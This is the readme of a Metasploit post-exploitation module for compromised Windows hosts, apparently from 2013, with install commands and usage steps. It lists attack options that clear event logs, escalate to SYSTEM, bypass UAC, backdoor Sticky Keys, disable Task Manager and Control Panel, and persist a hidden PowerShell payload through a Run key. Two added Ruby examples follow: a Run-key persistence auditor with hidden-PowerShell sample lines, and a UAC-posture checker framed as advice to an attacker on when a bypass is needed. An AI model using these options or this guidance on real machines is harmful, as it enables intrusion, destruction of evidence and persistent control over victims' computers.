Developer: pedro ubuntu "r00t-3xp10it"
Suspicious Shell Activity Labs@2013 | r00tsect0r
APPL => enumerate installed applications
CLEAR => clear the event logfiles on the target host (note: clearing the Security log writes an event of its own, 1102, that defenders can alert on)
GETPRIVS => elevate the meterpreter session to NT AUTHORITY\SYSTEM privileges
HOST => dump the target hosts file to the loot folder
HOSTFILE => add entries to the target hosts file: <ip-addr> <domain>
DELHOST => revert the target hosts file to its default settings
LOGIN => enumerate recently logged-on users
MSG => display one message box on the target desktop
SESSION => the session to run the module on
UACSET => check whether UAC is enabled and report its settings
UACBYPASS => bypass the UAC settings using the registry (regedit)
EXECUTE => execute a cmd command on the target host
LABEL => rename the C: hard drive display name (volume label)
SETCH => backdoor sethc.exe (Sticky Keys) on the target system
HIDETASK => restrict the use of Task Manager (hide it)
STOPPROCESS => stop a remote process from running (e.g. iexplore.exe)
PANIC => disable Control Panel, hide drives and desktop icons,
disable Task Manager, restrict the major browsers from running,
restart the host, and display a message box at login time.
POWERSHELL PERSISTENCE => persist a powershell.bat payload delivered
earlier by the 'netool.sh toolkit'; also uploads a hidden.vbs script
that runs the PowerShell payload in a hidden cmd window and inserts
a registry entry (HKLM\..\Run) to run the payload at startup.
"powershell.bat and hidden.vbs must be stored in /var/www"
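The POWERSHELL PERSISTENCE option leaves a Run-key value that starts a script launcher at boot. The following is an added example, not code from the my-auxiliary module: it parses the output of `reg query` on the HKLM Run key and flags the launch chains this kind of persistence produces (wscript/cscript running a .vbs, a .bat, or a PowerShell started with a hidden window). The sample output, value names and paths are constructed for the example.

```ruby
# Added example; it is not code from the my-auxiliary module.
# Audits a HKLM Run key dump for script-based persistence entries of the kind
# the POWERSHELL PERSISTENCE option installs (hidden.vbs -> powershell.bat).
# Input: text of  reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

RUN_KEY = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run'

# Launch chains worth flagging, checked in this order (first match wins).
SUSPICIOUS = {
  vbs_launcher:      /\b[wc]script(?:\.exe)?\b.*\.vbs\b/i,        # wscript.exe ... x.vbs
  hidden_powershell: /\bpowershell(?:\.exe)?\b.*-w(?:indowstyle)?\s+hidden\b/i,
  batch_launcher:    /\.bat\b/i,                                  # anything running a .bat
}.freeze

# One `reg query` value line: 4 spaces, name, 4 spaces, type, 4 spaces, data.
# Value names may contain single spaces, so the name is matched lazily.
VALUE_LINE = /\A\s{4}(?<name>.+?)\s{4}(?<type>REG_[A-Z_]+)\s{4}(?<data>.*)\z/

# Returns [{name:, type:, data:}, ...]; the key header and blank lines are skipped.
def parse_reg_query(output)
  output.each_line.map do |line|
    m = VALUE_LINE.match(line.chomp)
    m && { name: m[:name], type: m[:type], data: m[:data] }
  end.compact
end

# Returns the entries whose data matches a suspicious launch chain,
# each tagged with the matching reason.
def suspicious_run_entries(output)
  parse_reg_query(output).map do |entry|
    hit = SUSPICIOUS.find { |_, re| re.match?(entry[:data]) }
    hit && entry.merge(reason: hit.first)
  end.compact
end

# Constructed sample (not captured from a real host); the last two values are
# what a hidden.vbs launcher and a hidden PowerShell autorun look like.
SAMPLE = <<~REG
  HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
      SecurityHealth    REG_EXPAND_SZ    %windir%\\system32\\SecurityHealthSystray.exe
      VMware User Process    REG_SZ    "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe" -n vmusr
      WindowsUpdate    REG_SZ    wscript.exe //B "C:\\Windows\\Temp\\hidden.vbs"
      Updater    REG_SZ    powershell.exe -w hidden -ep bypass -f C:\\Users\\Public\\u.ps1
REG

if __FILE__ == $PROGRAM_NAME
  puts "Auditing #{RUN_KEY}"
  suspicious_run_entries(SAMPLE).each do |e|
    puts "  #{e[:reason]}: #{e[:name]} => #{e[:data]}"
  end
end
```

On a live host, feed the function the output of `reg query` taken through the EXECUTE option (or from a meterpreter `shell`), and check HKCU\...\Run and the RunOnce keys the same way; the parser does not care which key produced the dump.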
Special thanks to [darkoperator & sinn3r] from the Rapid7 community,
and to [Offensive Security]'s online course 'Metasploit Unleashed'
(the only core/API documentation available to study) :(
http://www.offensive-security.com/metasploit unleashed/Building_A_Module
http://www.offensive-security.com/metasploit unleashed/seful_API_Calls
[download the tool] (Ubuntu, Metasploit installer layout: <install>/msf3)
"open a terminal and type"
wget https://sourceforge.net/projects/myauxiliarymete/files/my-auxiliary.tar.gz
tar -xvf my-auxiliary.tar.gz
[copy the module into the Metasploit modules tree]
sudo cp my-auxiliary.rb <path-to-metasploit-install>/msf3/modules/auxiliary/analyze/my-auxiliary.rb
example:
sudo cp my-auxiliary.rb /opt/metasploit/msf3/modules/auxiliary/analyze/my-auxiliary.rb
(a copy under ~/.msf4/modules/auxiliary/analyze/ is loaded too and survives framework upgrades)
"search for the modules path manually"
root@ubuntu:~# locate modules/auxiliary/analyze
[load and run the module against an existing meterpreter session]
meterpreter> background
msf exploit(handler)> reload_all
msf exploit(handler)> use auxiliary/analyze/my-auxiliary
msf post(my-auxiliary)> show options
msf post(my-auxiliary)> set SESSION 1
msf post(my-auxiliary)> set UACSET true
msf post(my-auxiliary)> exploit    (run is equivalent for auxiliary/post modules)
[download the tool] (Kali Linux, package layout: /usr/share/metasploit-framework)
"open a terminal and type"
wget https://sourceforge.net/projects/myauxiliarymete/files/my-auxiliary.tar.gz
tar -xvf my-auxiliary.tar.gz
[copy the module into the Metasploit modules tree]
cp my-auxiliary.rb <path-to-metasploit-install>/modules/auxiliary/analyze/my-auxiliary.rb
example:
cp my-auxiliary.rb /usr/share/metasploit-framework/modules/auxiliary/analyze/my-auxiliary.rb
"search for the modules path manually"
root@kali:~# locate modules/auxiliary/analyze
[load and run the module against an existing meterpreter session]
meterpreter> background
msf exploit(handler)> reload_all
msf exploit(handler)> use auxiliary/analyze/my-auxiliary
msf post(my-auxiliary)> show options
msf post(my-auxiliary)> set SESSION 1
msf post(my-auxiliary)> set UACSET true
msf post(my-auxiliary)> exploit    (run is equivalent for auxiliary/post modules)
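The usage above ends with `set UACSET true`, i.e. the check of whether UAC is enabled and how it is configured. The following is an added example, not code from the my-auxiliary module: it maps the three registry values that such a check reads (EnableLUA, ConsentPromptBehaviorAdmin, PromptOnSecureDesktop under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System) to the UAC slider position and tells the operator whether an administrator session elevates silently (so UACBYPASS is unnecessary) or will hit a prompt. The defaults assumed for missing values are the Windows 7+ defaults; the commented Metasploit read call is the Msf::Post::Windows::Registry API, but the mapping itself is a pure function.

```ruby
# Added example; it is not code from the my-auxiliary module.
# Interprets the registry values behind a UAC check such as UACSET.

UAC_KEY = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'

# Meaning of ConsentPromptBehaviorAdmin (DWORD) for members of Administrators.
CONSENT_ADMIN = {
  0 => 'elevate without prompting',
  1 => 'prompt for credentials on the secure desktop',
  2 => 'prompt for consent on the secure desktop',
  3 => 'prompt for credentials',
  4 => 'prompt for consent',
  5 => 'prompt for consent for non-Windows binaries',
}.freeze

# Assumed Windows 7+ defaults, used when a value is absent from the key.
DEFAULTS = {
  'EnableLUA' => 1, 'ConsentPromptBehaviorAdmin' => 5, 'PromptOnSecureDesktop' => 1,
}.freeze

# values: Hash of value name => DWORD (or nil when missing). In a post module
# each one would come from registry_getvaldata(UAC_KEY, 'EnableLUA') etc.
def uac_posture(values)
  v = DEFAULTS.merge(values.reject { |_, d| d.nil? }).transform_values(&:to_i)
  enabled = v['EnableLUA'] == 1
  consent = v['ConsentPromptBehaviorAdmin']
  secure  = v['PromptOnSecureDesktop'] == 1

  slider =
    if !enabled
      'UAC disabled (EnableLUA=0; takes effect after reboot)'
    else
      # The four positions of the UAC slider in the Control Panel.
      case [consent, secure]
      when [2, true]  then 'Always notify'
      when [5, true]  then 'Notify when programs try to make changes (default)'
      when [5, false] then 'Notify, do not dim the desktop'
      when [0, false] then 'Never notify'
      else "Policy-set: #{CONSENT_ADMIN.fetch(consent, 'unknown')}, secure desktop #{secure ? 'on' : 'off'}"
      end
    end

  {
    enabled: enabled,
    slider: slider,
    admin_behaviour: CONSENT_ADMIN.fetch(consent, 'unknown'),
    # An admin token is elevated silently only when UAC is off or consent == 0;
    # otherwise a medium-integrity admin session needs user consent or a bypass.
    auto_elevates_admin: !enabled || consent == 0,
  }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample reads (not from a real host).
  [
    {},                                                               # all defaults
    { 'EnableLUA' => 0 },                                             # UAC off
    { 'ConsentPromptBehaviorAdmin' => 0, 'PromptOnSecureDesktop' => 0 }, # never notify
  ].each do |sample|
    p uac_posture(sample)
  end
end
```

When `auto_elevates_admin` is false and the session user is a local administrator, a bypass (UACBYPASS) or user interaction is needed before GETPRIVS-style elevation will succeed; when it is true, go straight to elevation.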
[Developed/coded by]
pedro ubuntu aka r00t-3xp10it
Suspicious Shell Activity Labs@2013 | r00tsect0r Team